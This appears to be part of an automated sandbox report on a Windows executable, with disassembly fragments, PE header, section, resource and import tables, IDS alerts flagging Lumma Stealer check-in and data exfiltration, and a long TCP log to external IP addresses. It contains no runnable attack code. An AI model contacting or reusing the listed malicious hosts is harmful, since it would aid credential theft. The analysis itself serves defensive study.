                                                                    mov dword ptr [ebp-0Ch], 01994000h
                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                    push eax
                                                                    push dword ptr [ebp-10h]
                                                                    push dword ptr [ebp-1Ch]
                                                                    push dword ptr [ebp-20h]
                                                                    call dword ptr [00401148h]
                                                                    leave
                                                                    retn 0008h
                                                                    sub eax, 000003A4h
                                                                    je 00007FA448872DF4h
                                                                    sub eax, 04h
                                                                    je 00007FA448872DE9h
                                                                    sub eax, 0Dh
                                                                    je 00007FA448872DDEh
                                                                    dec eax
                                                                    je 00007FA448872DD5h
                                                                    xor eax, eax
                                                                    ret
                                                                    mov eax, 00000404h
                                                                    ret
                                                                    mov eax, 00000412h
                                                                    ret
                                                                    mov eax, 00000804h
                                                                    ret
                                                                    mov eax, 00000411h
                                                                    ret
                                                                    mov edi, edi
                                                                    push esi
                                                                    push edi
                                                                    mov esi, eax
                                                                    push 00000101h
                                                                    xor edi, edi
                                                                    lea eax, dword ptr [esi+1Ch]
                                                                    push edi
                                                                    push eax
                                                                    call 00007FA448873C22h
                                                                    xor eax, eax
                                                                    movzx ecx, ax
                                                                    mov eax, ecx
                                                                    mov dword ptr [esi+04h], edi
                                                                    mov dword ptr [esi+08h], edi
                                                                    mov dword ptr [esi+0Ch], edi
                                                                    shl ecx, 10h
                                                                    or eax, ecx
                                                                    lea edi, dword ptr [esi+10h]
                                                                    stosd
                                                                    stosd
                                                                    stosd
                                                                    mov ecx, 0043C060h
                                                                    add esp, 0Ch
                                                                    lea eax, dword ptr [esi+1Ch]
                                                                    sub ecx, esi
                                                                    mov edi, 00000101h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ASM] VS2010 build 30319
                                                                    • [ C ] VS2010 build 30319
                                                                    • [C++] VS2010 build 30319
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [RES] VS2010 build 30319
                                                                    • [LNK] VS2010 build 30319

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3a9240x50.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e840000xb550.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44f00x40.text
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x214.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x3a5800x3a600False0.5114092612419701data5.626588044265271IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .data0x3c0000x1e4782c0x3e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x1e840000xb5500xb600False0.37613753434065933data4.067415538915995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    AFX_DIALOG_LAYOUT0x1e8baf00x2data5.0
                                                                    AFX_DIALOG_LAYOUT0x1e8baf80x2data5.0
                                                                    AFX_DIALOG_LAYOUT0x1e8bb000x2data5.0
                                                                    JASUZAHAVOWECAYEDEVIDAVETUNAGU0x1e8b4d00x61eASCII text, with very long lines (1566), with no line terminators0.6136653895274585
                                                                    RT_CURSOR0x1e8bb080x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
                                                                    RT_CURSOR0x1e8bc500x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                    RT_CURSOR0x1e8bd800xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.44583333333333336
                                                                    RT_CURSOR0x1e8be700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.0877110694183865
                                                                    RT_CURSOR0x1e8cf480x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4473684210526316
                                                                    RT_CURSOR0x1e8d0780xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.4625
                                                                    RT_CURSOR0x1e8d1680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.08583489681050657
                                                                    RT_CURSOR0x1e8e2400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3407039711191336
                                                                    RT_ICON0x1e846500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.26649377593360996
                                                                    RT_ICON0x1e86bf80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.31475409836065577
                                                                    RT_ICON0x1e875a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6538808664259927
                                                                    RT_ICON0x1e87e500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.47883817427385894
                                                                    RT_ICON0x1e8a3f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.5056285178236398
                                                                    RT_STRING0x1e8ed180x2baMatlab v4 mat-file (little endian) K, numeric, rows 0, columns 00.4813753581661891
                                                                    RT_STRING0x1e8efd80x332data0.4743276283618582
                                                                    RT_STRING0x1e8f3100x240data0.4861111111111111
                                                                    RT_GROUP_CURSOR0x1e8bc380x14data1.15
                                                                    RT_GROUP_CURSOR0x1e8eae80x14data1.25
                                                                    RT_GROUP_CURSOR0x1e8cf180x30data1.0
                                                                    RT_GROUP_CURSOR0x1e8e2100x30data1.0
                                                                    RT_GROUP_ICON0x1e8b4a00x30data0.9375
                                                                    RT_GROUP_ICON0x1e875800x22data0.9705882352941176
                                                                    RT_VERSION0x1e8eb000x214data0.543233082706767

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllGetConsoleAliasExesA, FindResourceW, ReadConsoleA, GetNamedPipeHandleStateA, GetModuleHandleExW, WriteConsoleInputA, GetComputerNameW, FreeEnvironmentStringsA, GetConsoleAliasesLengthA, WaitNamedPipeW, EnumTimeFormatsA, EnumTimeFormatsW, GetCommandLineA, GetDriveTypeA, GetEnvironmentStrings, FindResourceExA, GetConsoleCP, LoadLibraryW, GetLocaleInfoW, SwitchToFiber, GetCalendarInfoW, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, HeapQueryInformation, SetSystemPowerState, GetAtomNameW, GetCompressedFileSizeA, MultiByteToWideChar, GetStartupInfoW, DisconnectNamedPipe, FlushFileBuffers, GetShortPathNameA, GetConsoleAliasesW, WriteConsoleInputW, GetLastError, IsDBCSLeadByteEx, GetCurrentDirectoryW, SetLastError, PeekConsoleInputW, RemoveDirectoryA, EnumSystemCodePagesW, SetComputerNameA, GetTempFileNameA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, CreateHardLinkW, AddAtomW, OpenJobObjectW, FindAtomA, GetTapeParameters, EnumDateFormatsA, GetModuleHandleA, FindNextFileW, GetStringTypeW, VirtualProtect, PurgeComm, QueryPerformanceFrequency, GetShortPathNameW, SetCalendarInfoA, FindFirstVolumeA, GetWindowsDirectoryW, GetVolumeNameForVolumeMountPointW, GetCurrentProcessId, AddConsoleAliasA, ReadConsoleOutputCharacterW, SetDefaultCommConfigA, InterlockedExchange, GetCommandLineW, WideCharToMultiByte, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, DeleteFileA, HeapReAlloc, HeapSetInformation, RaiseException, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapFree, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, WriteFile, GetModuleFileNameW, HeapCreate, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, Sleep, SetStdHandle, GetConsoleMode, RtlUnwind, HeapSize, WriteConsoleW, ReadFile, CloseHandle, CreateFileW
                                                                    USER32.dllCharUpperBuffA, CharUpperA
                                                                    GDI32.dllGetCharWidthA, GetKerningPairsA

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.3104.21.1.1849855802048093 10/03/23-09:55:18.464087TCP2048093ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In4985580192.168.2.3104.21.1.18
                                                                    192.168.2.3172.67.137.12549842802048094 10/03/23-09:55:14.607034TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4984280192.168.2.3172.67.137.125
                                                                    192.168.2.3172.67.151.21949864802048094 10/03/23-09:55:20.960656TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4986480192.168.2.3172.67.151.219
                                                                    192.168.2.3104.21.1.1849859802048094 10/03/23-09:55:19.654804TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4985980192.168.2.3104.21.1.18
                                                                    192.168.2.3104.21.81.1749834802048094 10/03/23-09:55:12.695709TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4983480192.168.2.3104.21.81.17
                                                                    91.227.16.22192.168.2.380498162018572 10/03/23-09:55:07.486428TCP2018572ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)804981691.227.16.22192.168.2.3
                                                                    192.168.2.3104.21.1.1849921802048094 10/03/23-09:55:50.248359TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4992180192.168.2.3104.21.1.18
                                                                    192.168.2.3104.21.81.1749829802048093 10/03/23-09:55:12.132298TCP2048093ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In4982980192.168.2.3104.21.81.17

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 3, 2023 09:54:19.817512989 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:20.108292103 CEST8049803211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:20.108412981 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:20.108772993 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:20.108772993 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:20.410119057 CEST8049803211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:21.226350069 CEST8049803211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:21.226381063 CEST8049803211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:21.226641893 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:21.226641893 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:21.618383884 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:21.781148911 CEST8049804200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:21.781347036 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:21.781431913 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:21.781454086 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:21.944374084 CEST8049804200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:22.016354084 CEST4980380192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:22.307092905 CEST8049803211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:22.573386908 CEST8049804200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:22.573602915 CEST8049804200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:22.573657036 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:22.573798895 CEST4980480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:22.696398020 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:22.736190081 CEST8049804200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:22.861579895 CEST8049805200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:22.861665964 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:22.861876965 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:22.861905098 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:23.027551889 CEST8049805200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:23.650286913 CEST8049805200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:23.650352955 CEST8049805200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:23.650414944 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:23.650494099 CEST4980580192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:23.815649033 CEST8049805200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:23.908407927 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:24.212234974 CEST8049806211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:24.212445974 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:24.212740898 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:24.212742090 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:24.526566029 CEST8049806211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:25.387819052 CEST8049806211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:25.387876987 CEST8049806211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:25.387994051 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:25.387994051 CEST4980680192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:25.508362055 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:25.673592091 CEST8049807200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:25.673935890 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:25.673935890 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:25.673935890 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:25.695534945 CEST8049806211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:25.839458942 CEST8049807200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:26.459897041 CEST8049807200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:26.460047960 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:26.460294962 CEST8049807200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:26.460369110 CEST4980780192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:54:26.625046968 CEST8049807200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:54:26.635572910 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:26.940115929 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:26.940479994 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:27.051235914 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:27.051235914 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:27.366656065 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:27.719454050 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:28.015714884 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:28.566061020 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:28.566180944 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:28.566519022 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:28.566519022 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:28.978471994 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.134980917 CEST8049809186.147.159.19192.168.2.3
                                                                    Oct 3, 2023 09:54:29.135221958 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.135386944 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.135423899 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.294688940 CEST8049809186.147.159.19192.168.2.3
                                                                    Oct 3, 2023 09:54:29.498617887 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:29.498837948 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:29.532005072 CEST4980880192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:54:29.709949970 CEST8049809186.147.159.19192.168.2.3
                                                                    Oct 3, 2023 09:54:29.710017920 CEST8049809186.147.159.19192.168.2.3
                                                                    Oct 3, 2023 09:54:29.710086107 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.710087061 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.710272074 CEST4980980192.168.2.3186.147.159.19
                                                                    Oct 3, 2023 09:54:29.825339079 CEST8049808211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:54:29.869765997 CEST8049809186.147.159.19192.168.2.3
                                                                    Oct 3, 2023 09:54:30.048127890 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:30.331080914 CEST8049810186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:54:30.331280947 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:30.331373930 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:30.331373930 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:30.614485025 CEST8049810186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:54:31.266067982 CEST8049810186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:54:31.266355991 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:31.266525030 CEST8049810186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:54:31.266592979 CEST4981080192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:54:31.551846981 CEST8049810186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:54:31.731384039 CEST4981180192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:54:34.751080990 CEST4981180192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:54:40.766458035 CEST4981180192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:02.560108900 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:02.844294071 CEST8049813186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:55:02.844391108 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:02.844602108 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:02.844633102 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:03.128428936 CEST8049813186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:55:03.776099920 CEST8049813186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:55:03.776159048 CEST8049813186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:55:03.776359081 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:04.047391891 CEST4981380192.168.2.3186.182.55.44
                                                                    Oct 3, 2023 09:55:04.167603970 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:04.331386089 CEST8049813186.182.55.44192.168.2.3
                                                                    Oct 3, 2023 09:55:04.333190918 CEST8049814200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:55:04.333314896 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:04.333462954 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:04.333498955 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:04.499310017 CEST8049814200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:55:05.114358902 CEST8049814200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:55:05.114386082 CEST8049814200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:55:05.114576101 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:05.114675045 CEST4981480192.168.2.3200.92.136.254
                                                                    Oct 3, 2023 09:55:05.229173899 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:05.280692101 CEST8049814200.92.136.254192.168.2.3
                                                                    Oct 3, 2023 09:55:05.547076941 CEST8049815211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:55:05.547415018 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:05.547636986 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:05.547779083 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:05.847572088 CEST8049815211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:55:06.685908079 CEST8049815211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:55:06.685956001 CEST8049815211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:55:06.686069012 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:06.686069012 CEST4981580192.168.2.3211.181.24.133
                                                                    Oct 3, 2023 09:55:06.983297110 CEST8049815211.181.24.133192.168.2.3
                                                                    Oct 3, 2023 09:55:07.039879084 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.261734962 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.262026072 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.262130976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.483879089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486428022 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486490965 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486542940 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.486551046 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486633062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486666918 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486685991 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.486728907 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486761093 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.486815929 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486898899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.486932993 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.486973047 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.487020016 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.487051964 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708275080 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708331108 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708343983 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708353043 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708369017 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708404064 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708467960 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708506107 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708513021 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708605051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708635092 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708647013 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708709955 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708740950 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708762884 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708853006 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.708884001 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.708936930 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709023952 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709052086 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709054947 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.709112883 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709146976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.709228039 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709297895 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709327936 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.709381104 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709410906 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.709441900 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.930427074 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930458069 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930473089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930495024 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930519104 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.930546045 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.930553913 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930706024 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930735111 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.930788040 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930891037 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.930917025 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.930954933 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931046963 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931072950 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.931107044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931211948 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931238890 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.931343079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931405067 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931432009 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.931448936 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931500912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931525946 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:07.931565046 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931616068 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:07.931641102 CEST4981680192.168.2.391.227.16.22
